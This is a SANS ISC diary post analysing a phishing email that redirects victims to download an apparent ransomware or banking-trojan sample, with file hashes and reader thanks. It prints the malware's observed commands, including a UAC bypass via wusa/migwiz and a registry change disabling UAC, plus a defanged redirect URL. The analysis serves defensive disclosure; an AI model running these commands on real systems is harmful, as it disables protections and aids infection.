Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: From Phishing To Ransomware? SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
From Phishing To Ransomware?

On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, those emails are simply part of classic phishing waves and try to steal credentials from victims but, this time, it was not a simple phishing. Here is a copy of the email, which was nicely redacted:

When the victim clicks on thee "Review and take action" button, (s)he is redirected to a first website:


This automatically redirects to a second site via a HTTP/301 code:


The following picture is displayed:

Yes, this is just a simple picture, no links are active. Where is the issue? Two seconds after that page has been loaded, the browser asks the victim to save a file. The HTML code contains indeed a new redirect:

<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">

The shortened URL links to:


This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the fist time on Friday, it was unknown on VT. Since, it has been uploaded by someone else and has a score of 47/71[1]. The file is identified by many AV's as a Banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:

I search for this email address and found a Tweet by @malwarehunterteam from April 25:

Some actions performed by the malware:

C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\ /quiet /extract:C:\Windows\system32\migwiz\ & exit
wusa C:\Users\admin\AppData\Local\Temp\ /quiet /extract:C:\Windows\system32\migwiz\

This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)[2]

"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"
"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

I saw many files created on the Desktop with filenames "lock_<randomstring>.<extension> but the honeypot files were not encrypted. I'm still having a look at the sample.


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS Threat Hunting London 2022


651 Posts
ISC Handler
May 13th 2019
Thank you Xavier

69 Posts
Amazing info! Many thanks!

5 Posts

Sign Up for Free or Log In to start participating in the conversation!